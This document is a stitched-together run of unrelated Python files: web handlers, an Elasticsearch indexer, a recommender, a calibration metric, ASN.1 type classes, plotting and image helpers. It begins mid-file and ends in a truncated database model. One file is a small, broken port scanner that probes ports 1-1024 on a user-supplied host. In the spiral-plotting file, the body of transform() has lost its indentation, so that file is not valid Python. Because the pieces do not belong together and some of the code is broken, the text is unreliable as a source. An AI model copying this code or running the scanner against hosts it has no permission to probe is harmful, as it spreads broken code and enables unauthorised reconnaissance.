            comment = self.get_argument('comment', None)
            c = models.Comment(
                author=author,
                comment=comment,
                thread_id=id)
            self.db.add(c)
            self.db.commit()
        except Exception as e:
            print(e)
            self.db.rollback()
        finally:
            self.db.close()
        self.write('ok')
def main():
    """Parse command-line options and serve the board app until interrupted."""
    tornado.options.parse_command_line()
    server = tornado.httpserver.HTTPServer(Application())
    server.listen(options.port)
    tornado.ioloop.IOLoop.instance().start()

if __name__ == '__main__':
    main()
|
"""
Usage:
1. put this file to the directory that you want to use in `path_deploy()`
2. change the app name if needed
3. run this file.
"""
import os
from os import path
from tornado import template
from pywebio.output import *
from pywebio.platform.path_deploy import filename_ok
from pywebio.session import *
#Change the name of the multipage app
app_name = 'A multipage app'
BASE_DIR = path.dirname(path.abspath(__file__))
TPL = """
<style>
body {
padding: 0 200px;
}
.sidebar {
padding-left: 20px;
position: fixed;
left: 0;
width: 250px;
top: 0;
bottom: 0;
background-color: #f2f2f2;
z-index: 999;
padding-bottom: 60px;
}
iframe {
display: none;
position: fixed;
width: calc(100% - 200px);
height: 100%;
left: 200px;
top: 0;
right: 0;
bottom: 0;
z-index: 10;
}
.sidebar > .tree{
height: 100%;
overflow-y: auto;
}
</style>
<div class="sidebar">
<h3>Navigator</h3>
<div class="tree">
<ul>
{% for name, url in apps %}
<li><a href="javascript:iframe_open('{{url}}')">{{name}}</a></li>
{% end %}
{% for name, url in dirs %}
<li><a href="javascript:dir_open('{{url}}')">{{name}}\</a></li>
{% end %}
</ul>
</div>
</div>
<iframe src="#" frameborder="0"></iframe>
<script>
$('.footer').remove();
function iframe_open(url) {
$('iframe').show().attr('src', url);
$('.alert-info').hide();
}
function dir_open(url) {
window.location.hash = '#' + url;
window.location.reload();
}
</script>
"""
def main():
    """Render a sidebar navigator for the PyWebIO apps under BASE_DIR.

    The directory to list comes from the URL hash; every ``.py`` file that
    contains a ``main()`` becomes an app link, every sub-directory a folder
    link.
    """
    target_path = eval_js("window.location.hash")[1:].lstrip('/') or ''
    # a dot in the path could escape the deploy root; fall back to the root
    if '.' in target_path:
        target_path = ''
    p = path.join(BASE_DIR, target_path)
    apps = []
    dirs = []
    try:
        files = os.listdir(p)
    except Exception:
        put_error("URL error")
        return
    for f in files:
        if not filename_ok(f):
            continue
        full_path = path.join(p, f)
        if os.path.isfile(full_path):
            # only list runnable PyWebIO apps: .py files exposing a main()
            if not f.endswith('.py') or f == 'index.py':
                continue
            # BUG FIX: the file handle was previously leaked via
            # open(...).read(); also, non-.py files (read here as text,
            # risking decode errors) could end up listed as directories.
            with open(full_path) as fp:
                if 'main()' not in fp.read():
                    continue
            apps.append((f[:-3], path.join(target_path, f[:-3])))
        else:
            # only real sub-directories become folder links now
            dirs.append((f, path.join(target_path, f)))
    if target_path:
        dirs.append(['..', path.dirname(target_path)])
    tpl = template.Template(TPL)
    html = tpl.generate(apps=apps, dirs=dirs).decode('utf8')
    put_html(html)
    put_info("%s" % app_name)
if __name__ == '__main__':
    # Serve every app under BASE_DIR on port 8089 (debug on, no CDN assets).
    from pywebio.platform.path_deploy import path_deploy
    path_deploy(BASE_DIR, port=8089, debug=True, cdn=False)
|
import unittest
import os
from gmc.conf import settings
from gmc.core import handler
class TestSettings(unittest.TestCase):
    """Checks that gmc loads settings from a command-line supplied module."""
    def setUp(self):
        # Load 'setting.py' through the normal CLI entry point, silenced.
        handler.execute_from_command_line(['', 'setting.py'], quiet=True)
    def test_settings_loader(self):
        # NOTE(review): expects DATASET_DIR from the local setting.py
        # fixture — a machine-specific path; confirm the fixture ships with
        # the test suite.
        self.assertEqual(settings.DATASET_DIR, '/home/kapil')
|
#!/usr/bin/env python
# Python 2 script: prompts for a host, resolves it, then loops over ports
# 1-1024 opening TCP sockets (connect results are currently unused).
import socket
import subprocess
import sys
# Ask for input
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)
remoteServerEx = socket.gethostbyname_ex(remoteServer)
remoteok = True
print "-" * 60
print "Please wait, scanning remote host", remoteServerIP, remoteServerEx
print "-" * 60
try:
    for port in range(1, 1025):
        # NOTE(review): remoteok is cleared on the very first pass (has_ipv6
        # is always either True or False), so this while body runs for port 1
        # only and every later port is skipped — confirm the intended scan.
        while remoteok:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            result = sock.connect_ex((remoteServerIP, port))  # NOTE(review): result never inspected
            #if socket.has_ipv6 == 1:
            if socket.has_ipv6 == True:
                print "supported"
                remoteok = False
            if socket.has_ipv6 == False:
                print "not"
                remoteok = False
            sock.close()
except KeyboardInterrupt:
    print "CONTROL C"
    sys.exit()
#subprocess.call('ping', shell=True
'echo hello'  # NOTE(review): stray no-op string expression — dead code?
|
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import math as math
# Based on a matplotlib example at:
# https://matplotlib.org/mpl_toolkits/mplot3d/tutorial.html
def plotspiral(x_rot, y_rot, z_rot, scale):
    """Plot a parametric 3-D spiral after rotating and scaling it.

    :param x_rot: rotation angle about the x-axis (radians)
    :param y_rot: rotation angle about the y-axis (radians)
    :param z_rot: rotation angle about the z-axis (radians)
    :param scale: uniform scale factor applied after the rotations
    """
    mpl.rcParams['legend.fontsize'] = 10
    fig = plt.figure()
    # NOTE(review): fig.gca(projection='3d') was removed in matplotlib 3.6 —
    # newer versions require fig.add_subplot(projection='3d').
    ax = fig.gca(projection='3d')
    # spiral of varying radius: r grows quadratically with z
    theta = np.linspace(-4 * np.pi, 4 * np.pi, 100)
    z = np.linspace(-2, 2, 100)
    r = z**2 + 1
    x = r * np.sin(theta)
    y = r * np.cos(theta)
    x, y, z = transform(x, y, z, x_rot, y_rot, z_rot, scale)
    ax.plot(x, y, z, label='parametric curve')
    ax.legend()
    plt.show()
# Rotate around the x-axis, then the y-axis, then the z-axis, then scale
def transform(x, y, z, x_rot, y_rot, z_rot, scale):
# TODO
Matrix = np.array([x,y,z])
#Rx = [[1,0,0],[0,math.cos(x_rot),math.sin(x_rot)],[0,-math.sin(x_rot), math.cos(x_rot)]]#X Rotation Matrix
#Ry = [[math.cos(y_rot),0,-math.sin(y_rot)],[0,1,0],[math.sin(y_rot), 0,math.cos(y_rot)]]#Y Rotation Matrix
#Rz = [[math.cos(z_rot),math.sin(x_rot),0],[-math.sin(z_rot), math.cos(z_rot),0],[0,0,1]]#Z Rotation Matrix
Rx = [[1,0,0],
[0,math.cos(x_rot),-math.sin(x_rot)],
[0,math.sin(x_rot),math.cos(x_rot)]]
Ry = [[math.cos(y_rot),0,math.sin(y_rot)],
[0,1,0],
[-math.sin(y_rot),0,math.cos(y_rot)]]
Rz = [[math.cos(z_rot),-math.sin(z_rot),0],
[math.sin(z_rot),math.cos(z_rot),0],
[0, 0, 1]]
#MAT = np.matmul(Rx,Ry)
#MAT = np.matmul(MAT, Rz)
#Matrix = np.matmul(MAT, Matrix)
PT = np.matmul(np.matmul(Rz,np.matmul(Ry,Rx)),Matrix)*scale
return PT[0],PT[1],PT[2]
# Demo: rotate the spiral 90 degrees about x and y, no z rotation, unit scale.
plotspiral(math.pi/2,math.pi/2,0,1)
|
from elasticsearch import Elasticsearch
# client with default settings (connects to the local node)
es = Elasticsearch()
# Module to Include the Bulk Indexing Api
from elasticsearch import helpers
import csv
import time
# Target index configuration and input file location.
host = "localhost"
port = 9200
index = "medical"
type = "hcpc"  # NOTE(review): shadows the `type` builtin at module scope
filePath = "/home/matrix/ELK/data/hcpc.csv"
bulk_size = 500
# Pending bulk actions, flushed every `bulk_size` rows by composeDocuments().
actions = []
def readCsv(filePath):
    """Open the CSV file at *filePath* and return a DictReader over it.

    The file handle is left open on purpose: the returned reader streams
    rows from it lazily.
    """
    return csv.DictReader(open(filePath), delimiter=',')
def printFile(fileObj):
    # Debug helper: dump every row of the reader to stdout.
    for line in fileObj:
        print line
def composeDocuments(fileObj):
    """Turn CSV rows into bulk-index actions, flushing every `bulk_size` rows.

    Appends to the module-level `actions` list and sends each full batch via
    bulkIndex(); the trailing call flushes the final partial batch.
    """
    global actions
    for line in fileObj:
        action = {
            "_index": index,
            "_type": type,
            "_source":
            {'HCPC': line['HCPC'],
             'SEQNUM': line['SEQNUM'],
             'RECID': line['RECID'],
             'LONG_DESCRIPTION': line['LONG_DESCRIPTION'],
             'SHORT_DESCRIPTION': line['SHORT_DESCRIPTION']
             }
        }
        actions.append(action)
        if(len(actions) ==bulk_size):
            bulkIndex(actions)
            actions = []
    # flush whatever is left after the last full batch
    bulkIndex(actions)
    actions = []
def bulkIndex(action):
    # Send one batch of actions to Elasticsearch via the bulk helper.
    print "Processing"
    print len(action)
    helpers.bulk(es, action)
# Read the CSV, bulk-index it, and report how long the indexing took.
fileObj = readCsv(filePath)
# printFile(fileObj)
# BUG FIX: the timer previously started *after* composeDocuments() returned,
# so the printed duration was always ~0; start it before the work.
start = time.time()
composeDocuments(fileObj)
end = time.time()
print(end - start)
|
# Stephanie Gillow
# CS110
# I pledge my honor I have abided by the Stevens honor system.
import datetime
def checkDate(datestring):
    """Validate that *datestring* is a real calendar date in m/d/Y form.

    Raises ValueError (with a friendlier message) when parsing fails;
    returns None on success.
    """
    fmt = '%m/%d/%Y'
    try:
        datetime.datetime.strptime(datestring, fmt)
    except ValueError:
        raise ValueError("Invalid date, or incorrect format.")
# Prompt for a date; checkDate() raises ValueError (terminating the script)
# unless the input is a valid month/day/year date.
inputdate = input("Enter the date in month/day/year format: ")
checkDate(inputdate)
print("Your date is valid.")
|
from base.recommender import Recommender
from tool import qmath
from structure.symmetricMatrix import SymmetricMatrix
from collections import defaultdict
class UserKNN(Recommender):
    """User-based KNN recommender: ranks items by similarity-weighted scores
    from each user's top-N most similar neighbours.

    Similarities are precomputed once in initModel()/computeCorr() and kept
    in ``self.userSim``; the per-user neighbour lists live in
    ``self.topUsers``.
    """
    def __init__(self,conf,trainingSet=None,testSet=None,fold='[1]'):
        super(UserKNN, self).__init__(conf,trainingSet,testSet,fold)
        # pairwise user similarity matrix (symmetric)
        self.userSim = SymmetricMatrix(len(self.data.name2id['user']))
        # user -> top-N (neighbour, similarity) pairs
        self.topUsers = {}
    def readConfiguration(self):
        super(UserKNN, self).readConfiguration()
        # N, the neighbourhood size used when ranking
        self.neighbors = int(self.config['num.neighbors'])
    def printAlgorConfig(self):
        "show algorithm's configuration"
        super(UserKNN, self).printAlgorConfig()
        print ('Specified Arguments of',self.config['recommender']+':')
        print ('num.neighbors:',self.config['num.neighbors'])
        print ('='*80)
    def initModel(self):
        self.computeCorr()
    def predict(self,u):
        """Return items ranked by the similarity-weighted scores of u's
        top neighbours (items no neighbour has listened to are omitted)."""
        recommendations = []
        for item in self.data.listened[self.recType]:
            # NOTE: `sum` shadows the builtin within this loop
            sum, denom = 0, 0
            for simUser in self.topUsers[u]:
                #if user n has rating on item i
                if simUser[0] in self.data.listened[self.recType][item]:
                    similarity = simUser[1]
                    score = self.data.listened[self.recType][item][simUser[0]]
                    sum += similarity*score
                    denom += similarity
            if sum!=0:
                score = sum / float(denom)
                recommendations.append((item,score))
        recommendations = sorted(recommendations,key=lambda d:d[1],reverse=True)
        recommendations = [item[0] for item in recommendations]
        return recommendations
    def computeCorr(self):
        'compute correlation among users'
        userListen = defaultdict(dict)
        for user in self.data.userRecord:
            for item in self.data.userRecord[user]:
                # NOTE(review): the first listen initialises the count to 0
                # (later listens add 1). Only the key set is used below, so
                # similarities are unaffected — but the counts are off by one
                # if anything else ever reads them.
                if item[self.recType] in userListen[user]:
                    userListen[user][item[self.recType]] += 1
                else:
                    userListen[user][item[self.recType]] = 0
        print ('Computing user similarities...')
        for ind,u1 in enumerate(userListen):
            set1 = set(userListen[u1].keys())
            for u2 in userListen:
                if u1 != u2:
                    if self.userSim.contains(u1,u2):
                        continue
                    set2 = set(userListen[u2].keys())
                    sim = self.jaccard(set1,set2)
                    self.userSim.set(u1,u2,sim)
            self.topUsers[u1] = sorted(self.userSim[u1].items(), key=lambda d: d[1], reverse=True)[:self.neighbors]
            if ind%100==0:
                print (ind,'/',len(userListen), 'finished.')
        print ('The user correlation has been figured out.')
    def jaccard(self,s1,s2):
        # NOTE(review): this computes 2*|A∩B| / |A∪B|, which is neither the
        # standard Jaccard (|A∩B|/|A∪B|) nor Dice (2|A∩B|/(|A|+|B|)) and can
        # exceed 1 — confirm whether this weighting is intentional.
        return 2*len(s1.intersection(s2))/(len(s1.union(s2))+0.0)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Continuing from tboolean-12
TODO: merge this with the much better plotting technique (deferred placement) of x018_torus_hyperboloid_plt.py
"""
import numpy as np, math
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle, Ellipse
import matplotlib.lines as mlines
from opticks.ana.torus_hyperboloid import Tor, Hyp
def make_rect( cxy , wh, **kwa ):
    """Build a matplotlib Rectangle centred on a point.

    :param cxy: (x, y) centre of the rectangle
    :param wh: (width, height)
    :param kwa: forwarded to matplotlib.patches.Rectangle
    """
    half_w = wh[0]/2.
    half_h = wh[1]/2.
    lower_left = ( cxy[0] - half_w, cxy[1] - half_h )
    return Rectangle( lower_left, wh[0], wh[1], **kwa )
if __name__ == '__main__':
    # Geometry parameters (presumably mm; from the tboolean-12 model named in
    # the module docstring — TODO confirm units against the Opticks geometry).
    R,r = 97.000,52.010
    ch,cz,cn = 23.783,-23.773,-195.227
    cyr = 75.951
    r0 = R - r
    rr0 = r0*r0
    tor = Tor(R,r)
    # Sanity-check the torus radius-at-height function at waist and rim.
    assert tor.rz(0) == R - r
    assert tor.rz(r) == R
    # in torus/hyp frame cylinder top and bottom at
    ztop, zbot = ch - cz, -ch - cz # (47.556, -0.010000000000001563)
    rtop, rbot = tor.rz(ztop), tor.rz(zbot)
    # Fit a hyperboloid neck: waist radius rbot, passing through (rtop, ztop).
    zf = Hyp.ZF( rbot, ztop, rtop )
    hyp = Hyp( rbot, zf )
    #sz = R+1.5*r
    sz = 400
    # Ellipsoidal bulb outline: semi-axes era*exy (x) by era*ez (z).
    exy,ez = 1.391,1.000
    era = 179.00
    bulb = Ellipse( xy=(0,0), width=2*exy*era, height=2*ez*era, fill=False )
    # Left/right cross-sections of the torus tube and the neck cylinder.
    rhs = Circle( (R,cz), radius=r, fill=False)
    lhs = Circle( (-R,cz), radius=r, fill=False)
    cy = make_rect( (0,0), (2*cyr,2*ch), fill=False )
    byr = 45.010
    byh = 57.510
    cybase = make_rect( (0,-276.500), (2*byr, 2*byh), fill=False )
    cur = 254.00
    cuh = 92.000
    cycut = make_rect( (0,cuh) , (2*cur, 2*cuh), fill=False )
    # Assemble the 2D cross-section plot.
    plt.ion()
    fig = plt.figure(figsize=(5,5))
    plt.title("torus_hyperboloid_plt")
    ax = fig.add_subplot(111)
    ax.set_ylim([-sz,sz])
    ax.set_xlim([-sz,sz])
    ax.add_patch( bulb )
    ax.add_patch( lhs )
    ax.add_patch( rhs )
    ax.add_patch( cy )
    ax.add_patch( cybase )
    ax.add_patch( cycut )
    # Hyperboloid profile curve, shifted from torus/hyp frame by cz.
    z = np.linspace( -sz, sz, 100 )
    dz = cz
    rz = hyp.rz(z)
    ax.plot( rz, z + dz, c="b")
    ax.plot( -rz, z + dz, c="b")
    fig.show()
|
import numpy as np
class ECE:
    """Expected Calibration Error accumulator.

    Folds batches of (prediction, label, confidence) triples into per-bin
    statistics ``ece_mat`` of shape (n_bin, 3) = [count, n_correct, conf_sum],
    then derives ECE / MCE / VCE from them.  Bins are either fixed-width over
    [0, 1] or "dynamic" (equal-count, recomputed from all samples seen so far).

    Fix over the original: compute_ECE/compute_MCE/compute_VCE each duplicated
    the normalization already implemented by get_ECE_mat; they now reuse it.
    """

    def __init__(self, n_bin, dynamic=False):
        """:param n_bin: number of confidence bins.
        :param dynamic: use equal-count bins instead of fixed-width ones."""
        self.n_bin = n_bin
        self.dynamic = dynamic
        if dynamic:
            # All (pred, label, conf) triples seen so far, kept sorted by conf.
            self.list = []
            self.bin_lowers = np.zeros(n_bin)
            self.bin_uppers = np.zeros(n_bin)
        else:
            bin_boundaries = np.linspace(0, 1, n_bin + 1)
            self.bin_lowers = bin_boundaries[:-1]
            self.bin_uppers = bin_boundaries[1:]
        # (n_bin, 3) accumulator: [count, n_correct, conf_sum] per bin.
        self.ece_mat = None

    def compute_acc_conf(self, y_pred, y_true, conf):
        """Return the per-bin [count, n_correct, conf_sum] matrix for one batch."""
        acc = np.equal(y_true, y_pred)
        acc_conf = np.zeros((self.n_bin, 3))
        for i, (bin_lower, bin_upper) in enumerate(zip(self.bin_lowers, self.bin_uppers)):
            # Bins are half-open (lower, upper]; an exact conf of 0 would fall
            # through every bin, so fold it into the first one.
            in_bin = (conf > bin_lower.item()) & (conf <= bin_upper.item())
            if i == 0:
                in_bin |= (conf == 0)
            acc_conf[i, 0] = in_bin.astype(float).sum()
            if acc_conf[i, 0] > 0:
                acc_conf[i, 1] = acc[in_bin].astype(float).sum()
                acc_conf[i, 2] = conf[in_bin].astype(float).sum()
        # Every sample must land in exactly one bin.
        n_total_data = np.sum(acc_conf, axis=0)[0]
        assert n_total_data == y_true.shape[0]
        return acc_conf

    def split_dynamic_bin(self):
        """Re-bin all stored samples into n_bin equal-count bins (sorted by conf)."""
        acc_conf = np.zeros((self.n_bin, 3))
        samples_in_bin = len(self.list) // self.n_bin
        rest_samples = len(self.list) % self.n_bin
        end_idx = 0
        for i in range(self.n_bin):
            start_idx = end_idx
            # Spread the remainder over the first `rest_samples` bins.
            end_idx = start_idx + samples_in_bin + (1 if i < rest_samples else 0)
            temp_arr = np.array(self.list[start_idx: end_idx])
            correct = (temp_arr[:, 0] == temp_arr[:, 1]).sum()
            conf = temp_arr[:, 2].sum()
            acc_conf[i, 0] = end_idx - start_idx
            acc_conf[i, 1] = correct
            acc_conf[i, 2] = conf
            self.bin_lowers[i] = temp_arr[:, 2].min()  # TODO: need to minus epsilon?
            self.bin_uppers[i] = temp_arr[:, 2].max()
        return acc_conf

    def get_ECE_mat(self):
        """Return the normalized matrix [bin_weight, bin_accuracy, bin_mean_conf]."""
        res_mat = np.copy(self.ece_mat)
        ind = res_mat[:, 0] > 0
        res_mat[ind, 1] = np.divide(res_mat[ind, 1], res_mat[ind, 0])
        res_mat[ind, 2] = np.divide(res_mat[ind, 2], res_mat[ind, 0])
        res_mat[:, 0] = np.divide(res_mat[:, 0], np.sum(res_mat[:, 0]))
        return res_mat

    def compute_ECE(self):
        """Expected Calibration Error: weighted mean of |accuracy - confidence|."""
        res_mat = self.get_ECE_mat()
        return np.sum(np.multiply(res_mat[:, 0], np.absolute(res_mat[:, 1] - res_mat[:, 2])))

    def compute_MCE(self):
        """Maximum Calibration Error: worst per-bin |accuracy - confidence|."""
        res_mat = self.get_ECE_mat()
        return np.max(np.absolute(res_mat[:, 1] - res_mat[:, 2]))

    def compute_VCE(self):
        """Variance-style calibration error: weighted squared deviation of the
        per-bin gap from the overall ECE."""
        ece = self.compute_ECE()
        res_mat = self.get_ECE_mat()
        return np.sum(np.multiply(res_mat[:, 0], np.square(np.absolute(res_mat[:, 1] - res_mat[:, 2]) - ece)))

    def add_data(self, y_pred, y_true, conf):
        """Fold one batch of predictions into the accumulated statistics."""
        if self.dynamic:
            cur_list = [(p, t, c) for (p, t, c) in zip(y_pred, y_true, conf)]
            self.list = self.list + cur_list
            self.list = sorted(self.list, key=lambda x: x[2])
            self.ece_mat = self.split_dynamic_bin()
        else:
            temp_mat = self.compute_acc_conf(y_pred, y_true, conf)
            if self.ece_mat is None:
                self.ece_mat = temp_mat
            else:
                self.ece_mat = self.ece_mat + temp_mat
if __name__ == '__main__':
    # Smoke test: 8 predictions, 15 fixed-width bins.
    ece_metric = ECE(15)
    predictions = np.array([0, 1, 2, 3, 4, 5, 1, 2])
    labels = np.array([0, 1, 2, 2, 2, 3, 1, 2])
    confidences = np.array([0.4, 0.2, 0.3, 0.5, 0.3, 0.7, 0.8, 0.3])
    ece_metric.add_data(predictions, labels, confidences)
    print(ece_metric.ece_mat)
    print(ece_metric.compute_ECE())
|
from pyasn1.type.namedtype import NamedType, NamedTypes, OptionalNamedType, DefaultedNamedType
from pyasn1.type.namedval import NamedValues
from asn1PERser.classes.data.builtin import *
from asn1PERser.classes.types.type import AdditiveNamedTypes
from asn1PERser.classes.types.constraint import MIN, MAX, NoConstraint, ExtensionMarker, SequenceOfValueSize, \
ValueRange, SingleValue, ValueSize, ConstraintOr, ConstraintAnd
# ASN.1 value assignments referenced by the size constraints below.
# NOTE(review): these look like asn1PERser-generated PER bindings — keep the
# declarative structure and ordering intact.
minNumber = IntegerType(-10)
maxNumber = IntegerType(255)
class MyBitString(BitStringType):
    # BIT STRING with an extensible SIZE(1..maxNumber) constraint.
    subtypeSpec = ValueSize(1, maxNumber, extensionMarker=True)
class TcpData(IntegerType):
    # Unconstrained INTEGER alias.
    pass
class SrcUdpTput(IntegerType):
    # Unconstrained INTEGER alias.
    pass
class TgtUdpTput(IntegerType):
    # Unconstrained INTEGER alias.
    pass
class InnerSequence(SequenceType):
    # SEQUENCE { i0 INTEGER, i1 INTEGER }
    rootComponent = AdditiveNamedTypes(
        NamedType('i0', IntegerType()),
        NamedType('i1', IntegerType()),
    )
    componentType = rootComponent
class MySeq1(SequenceType):
    # SEQUENCE { data CHOICE {...}, my-int-3 INTEGER (10..20), my-octet OCTET STRING }
    class data(ChoiceType):
        # CHOICE over an inner sequence, two integers, and a bit string.
        class my_int_2(IntegerType):
            # INTEGER (1..2)
            subtypeSpec = ValueRange(1, 2)
        rootComponent = AdditiveNamedTypes(
            NamedType('inner-seq', InnerSequence()),
            NamedType('my-int-1', IntegerType()),
            NamedType('my-int-2', my_int_2()),
            NamedType('my-bit', MyBitString()),
        )
        componentType = rootComponent
    class my_int_3(IntegerType):
        # INTEGER (10..20)
        subtypeSpec = ValueRange(10, 20)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
        NamedType('my-int-3', my_int_3()),
        NamedType('my-octet', OctetStringType()),
    )
    componentType = rootComponent
class MySeq2(SequenceType):
    # SEQUENCE { i0 INTEGER, enum-one ENUMERATED, o1 OCTET STRING (SIZE(1..10)) }
    class enum_one(EnumeratedType):
        # Extensible enumeration with root values one(0), two(1).
        subtypeSpec = ExtensionMarker(True)
        enumerationRoot = NamedValues(
            ('one', 0),
            ('two', 1),
        )
        namedValues = enumerationRoot
    class o1(OctetStringType):
        # OCTET STRING (SIZE(1..10))
        subtypeSpec = ValueSize(1, 10)
    rootComponent = AdditiveNamedTypes(
        NamedType('i0', IntegerType()),
        NamedType('enum-one', enum_one()),
        NamedType('o1', o1()),
    )
    componentType = rootComponent
# Four structurally identical extensible SEQUENCEs, each wrapping a single
# SEQUENCE (SIZE(1..maxNumber)) OF <integer alias> field named 'data'.
class SrcTcpData(SequenceType):
    class data(SequenceOfType):
        subtypeSpec = SequenceOfValueSize(1, maxNumber)
        componentType = TcpData()
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
    )
    componentType = rootComponent
class TgtTcpData(SequenceType):
    class data(SequenceOfType):
        subtypeSpec = SequenceOfValueSize(1, maxNumber)
        componentType = TcpData()
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
    )
    componentType = rootComponent
class SrcUdpData(SequenceType):
    class data(SequenceOfType):
        subtypeSpec = SequenceOfValueSize(1, maxNumber)
        componentType = SrcUdpTput()
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
    )
    componentType = rootComponent
class TgtUdpData(SequenceType):
    class data(SequenceOfType):
        subtypeSpec = SequenceOfValueSize(1, maxNumber)
        componentType = TgtUdpTput()
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
    )
    componentType = rootComponent
class BigIpData(SequenceType):
    # SEQUENCE { d0 INTEGER (-1..1), d1 OCTET STRING (SIZE(1..20)) }
    class d0(IntegerType):
        subtypeSpec = ValueRange(-1, 1)
    class d1(OctetStringType):
        subtypeSpec = ValueSize(1, 20)
    rootComponent = AdditiveNamedTypes(
        NamedType('d0', d0()),
        NamedType('d1', d1()),
    )
    componentType = rootComponent
class IpData(SequenceType):
    # Extensible SEQUENCE holding SEQUENCE (SIZE(1..maxNumber)) OF BigIpData.
    class data(SequenceOfType):
        subtypeSpec = SequenceOfValueSize(1, maxNumber)
        componentType = BigIpData()
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('data', data()),
    )
    componentType = rootComponent
class MyChoice(ChoiceType):
    # CHOICE { enum-two ENUMERATED, inner-seq-2 SEQUENCE,
    #          o1 OCTET STRING (SIZE(1..10)), my-int-4 INTEGER }
    class enum_two(EnumeratedType):
        # Non-extensible enumeration: three(0), four(1).
        enumerationRoot = NamedValues(
            ('three', 0),
            ('four', 1),
        )
        namedValues = enumerationRoot
    class inner_seq_2(SequenceType):
        # SEQUENCE { i0 INTEGER, i1 BIT STRING (SIZE(1..2)) }
        class i1(BitStringType):
            subtypeSpec = ValueSize(1, 2)
        rootComponent = AdditiveNamedTypes(
            NamedType('i0', IntegerType()),
            NamedType('i1', i1()),
        )
        componentType = rootComponent
    class o1(OctetStringType):
        subtypeSpec = ValueSize(1, 10)
    rootComponent = AdditiveNamedTypes(
        NamedType('enum-two', enum_two()),
        NamedType('inner-seq-2', inner_seq_2()),
        NamedType('o1', o1()),
        NamedType('my-int-4', IntegerType()),
    )
    componentType = rootComponent
|
import cv2
# Fraction by which source images are shrunk before drawing.
resizeFactor = 0.5
# Radius (px) of each drawn point marker.
circle_radius = 2
def draw_points(means, image_filename, output_filename, color):
    """Draw every (x, y) point in *means* as a small filled circle on a
    half-size copy of the image and save it to *output_filename*.

    NOTE: points are drawn at their given coordinates on the resized image —
    callers are expected to pass coordinates in the resized frame.
    """
    source = cv2.imread(image_filename)
    canvas = cv2.resize(source, (0, 0), fx=resizeFactor, fy=resizeFactor)
    for point in means:
        cv2.circle(canvas, (point[0], point[1]), circle_radius, color, thickness=3)
    cv2.imwrite(output_filename, canvas)
def draw_point_sets(point_sets, image_filename, output_filename, colors):
    """Like draw_points, but draws several point sets on one half-size copy,
    using colors[i] for the i-th set, then saves the composite image."""
    source = cv2.imread(image_filename)
    canvas = cv2.resize(source, (0, 0), fx=resizeFactor, fy=resizeFactor)
    for set_index, point_set in enumerate(point_sets):
        set_color = colors[set_index]
        for point in point_set:
            cv2.circle(canvas, (point[0], point[1]), circle_radius, set_color, thickness=3)
    cv2.imwrite(output_filename, canvas)
|
def find_indices(N, m):
    """Write per-thread chunk boundaries for a triangular SNP-triple search
    to indexes.txt.

    The search space is all index triples (a, b, c) with 0 <= a < b < c < N in
    lexicographic order; it decomposes into N-2 "semi-triangles" (the first
    with N-2 rows, the next with N-3, ...).  Every m-th triple becomes a
    boundary: each output line holds the previous boundary triple followed by
    the next one, so each worker knows the range of m triples it owns.
    All indices are 0-based.

    Fixes over the original: integer division (//) keeps the running totals
    exact ints (the old float "/" loses precision for large N on Python 3,
    though the written output for small N is unchanged), and the output file
    is managed with a context manager instead of a `file`-named handle that
    shadowed the builtin and leaked on error.

    :param N: number of SNPs; triples run (0,1,2) ... (N-3,N-2,N-1).
    :param m: number of triples handled by each thread.
    :return: 0 (the result is the side effect of writing indexes.txt).
    """
    m_orig = m
    triangle_cumsum = 0      # triples contained in all triangles seen so far
    current_count = 0
    newIndex = (0, 1, 2)
    with open('indexes.txt', 'w') as out:
        for i in range(N - 2, 0, -1):
            old_triangle_cumsum = triangle_cumsum
            # The current triangle holds i*(i+1)/2 triples (exact int via //).
            triangle_cumsum = triangle_cumsum + i * (i + 1) // 2
            triangle_index = (N - 2) - i
            triangle_rows = i
            if triangle_cumsum >= m:
                # The m-th triple lies inside this triangle: find its row by
                # accumulating row sizes from the bottom ...
                current_count = old_triangle_cumsum
                for j in reversed(range(triangle_rows)):
                    current_count = current_count + (j + 1)
                    if current_count >= m:
                        # ... then walk along that row to the exact position.
                        for k in range(j + 1):
                            if k + 1 + current_count - (j + 1) == m:
                                oldIndex = newIndex
                                newIndex = (triangle_index, N - 2 - j, N - 2 - j + 1 + k)
                                out.write(str(oldIndex[0]) + ',' + str(oldIndex[1]) + ',' + str(oldIndex[2]) +
                                          ',' + str(newIndex[0]) + ',' + str(newIndex[1]) + ',' + str(newIndex[2]) + '\n')
                                # Advance the target to the next chunk boundary.
                                m = m + m_orig
        # Final (possibly short) chunk up to the very last triple.
        if newIndex != (N - 3, N - 2, N - 1):
            out.write(str(newIndex[0]) + ',' + str(newIndex[1]) + ',' + str(newIndex[2]) +
                      ',' + str(N - 3) + ',' + str(N - 2) + ',' + str(N - 1) + '\n')
    return 0
if __name__ == "__main__":
N = 99
m = 10000
find_indices(N,m)
|
from sqlalchemy import Column, Integer, String
from bitcoin_acks.database.base import Base
class PullRequestsLabels(Base):
    """Join table linking pull requests to labels (presumably many-to-many —
    no ForeignKey constraints are declared here; verify against the related
    models)."""
    __tablename__ = 'pull_requests_labels'
    # Surrogate auto-incrementing primary key.
    id = Column(Integer, primary_key=True)
    # Identifiers stored as plain strings.
